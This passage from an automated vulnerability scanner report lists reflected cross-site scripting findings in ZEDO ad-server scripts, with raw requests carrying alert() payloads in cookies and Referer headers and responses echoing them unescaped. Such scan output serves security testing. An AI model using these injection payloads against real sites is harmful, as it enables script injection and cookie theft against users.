Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFpb=1220:4f791'1aa4b(a)1243ae578bf; FFad=0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1016
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'1aa4b(a)1243ae578bf;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=252
Expires: Fri, 28 Jan 2011 17:30:57 GMT
Date: Fri, 28 Jan 2011 17:26:45 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/c5;referrer='+document.referrer+';tag=c7.zedo.com/bar/v16-401/c5/jsc/fm.js;qs=;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='None,4f791'1aa4b(a)1243ae578bf';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=None,4f791'1aa4b(a)1243ae578bf;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;
v
...[SNIP]...

4.1037. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [ZEDOIDA cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b470"-alert(1)-"e08a3e6143 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /bar/v16-401/c5/jsc/fm.js?c=101&a=0&f=&n=1220&r=13&d=9&q=&$=&s=69&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&z=0.11480318708345294 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~0104116b470"-alert(1)-"e08a3e6143; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=39
Expires: Fri, 28 Jan 2011 16:42:00 GMT
Date: Fri, 28 Jan 2011 16:41:21 GMT
Connection: close
Content-Length: 1953

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=69;var zzPat='';var zzCu
...[SNIP]...
m();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~0104116b470"-alert(1)-"e08a3e6143';

var zzhasAd=undefined;

var zzStr = "s=69;u=INmz6woBADYAAHrQ5V4AAACH~0104116b470"-alert(1)-"e08a3e6143;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

4.1038. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [ZEDOIDA cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1c31"-alert(1)-"9a8564b65f6 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /bar/v16-401/c5/jsc/fm.js?c=167&a=0&f=&n=1220&r=13&d=14&q=&$=&s=126&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/&z=0.9975781855173409 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411e1c31"-alert(1)-"9a8564b65f6; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFad=0; FFcat=1220,101,9

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=36
Expires: Fri, 28 Jan 2011 16:41:50 GMT
Date: Fri, 28 Jan 2011 16:41:14 GMT
Connection: close
Content-Length: 1959

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=126;var zzPat='';var zzC
...[SNIP]...
);}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411e1c31"-alert(1)-"9a8564b65f6';

var zzhasAd=undefined;

var zzStr = "s=126;u=INmz6woBADYAAHrQ5V4AAACH~010411e1c31"-alert(1)-"9a8564b65f6;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

4.1039. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [FFpb cookie] previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fmr.js

Issue detail

The value of the FFpb cookie is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 91742(a)29b2b8ea683 was submitted in the FFpb cookie. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /bar/v16-401/c5/jsc/fmr.js HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFpb=1220:4f791'91742(a)29b2b8ea683; FFad=0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1017
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'91742(a)29b2b8ea683;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=251
Expires: Fri, 28 Jan 2011 17:30:57 GMT
Date: Fri, 28 Jan 2011 17:26:46 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/c5;referrer='+document.referrer+';tag=c7.zedo.com/bar/v16-401/c5/jsc/fmr.js;qs=;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='None,4f791'91742(a)29b2b8ea683';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=None,4f791'91742(a)29b2b8ea683;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;
v
...[SNIP]...

4.1040. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [ZEDOIDA cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fmr.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74c5d"-alert(1)-"8b3d70f9a46 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /bar/v16-401/c5/jsc/fmr.js?c=101&a=0&f=&n=1220&r=13&d=9&q=&$=&s=69&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&z=0.11480318708345294 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~01041174c5d"-alert(1)-"8b3d70f9a46; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=35
Expires: Fri, 28 Jan 2011 16:41:50 GMT
Date: Fri, 28 Jan 2011 16:41:15 GMT
Connection: close
Content-Length: 1956

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=69;var zzPat='';var zzCu
...[SNIP]...
();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~01041174c5d"-alert(1)-"8b3d70f9a46';

var zzhasAd=undefined;

var zzStr = "s=69;u=INmz6woBADYAAHrQ5V4AAACH~01041174c5d"-alert(1)-"8b3d70f9a46;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

4.1041. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [FFpb cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the FFpb cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 646ab"-alert(1)-"3ae61a116c4 was submitted in the FFpb cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=9&q=&$=spectrum300x250&s=2&z=0.47118410957045853 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000004165407&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=38178276&rk1=15197426&rk2=1296251850.36&pt=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZCBC=1; FFgeo=5386156; aps=2; FFpb=1220:4f791'$951:ibnetwork300x250646ab"-alert(1)-"3ae61a116c4; FFcat=826,187,9:951,2,9:951,7,9:1220,101,9; FFad=3:1:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294,2#776116#653213|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:0,27,2; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1; ZFFAbh=749B826,20|1483_759#365

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:spectrum300x250,ibnetwork300x250646ab"-alert(1)-"3ae61a116c4;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,9:951,2,9:951,7,9:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=4:2:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294,2#776116#653213#562813|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:0,27,2:0,26,1;expires=Mon, 28 Feb 2011 02:02:42 GMT;path=/;domain=.zedo.com;
ETag: "19b436a-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=114
Expires: Sat, 29 Jan 2011 02:04:36 GMT
Date: Sat, 29 Jan 2011 02:02:42 GMT
Connection: close
Content-Length: 2517

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='spectrum300x250,ibnetwork300x250646ab"-alert(1)-"3ae61a116c4';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=spectrum300x250,ibnetwork300x250646ab"-alert(1)-"3ae61a116c4;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;

...[SNIP]...

4.1042. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [FFpb cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the FFpb cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 390b7'-alert(1)-'191f222b511 was submitted in the FFpb cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=9&q=&$=spectrum300x250&s=2&z=0.47118410957045853 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000004165407&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=38178276&rk1=15197426&rk2=1296251850.36&pt=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZCBC=1; FFgeo=5386156; aps=2; FFpb=1220:4f791'$951:ibnetwork300x250390b7'-alert(1)-'191f222b511; FFcat=826,187,9:951,2,9:951,7,9:1220,101,9; FFad=3:1:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294,2#776116#653213|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:0,27,2; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1; ZFFAbh=749B826,20|1483_759#365

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:spectrum300x250,ibnetwork300x250390b7'-alert(1)-'191f222b511;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,9:951,2,9:951,7,9:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=4:2:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
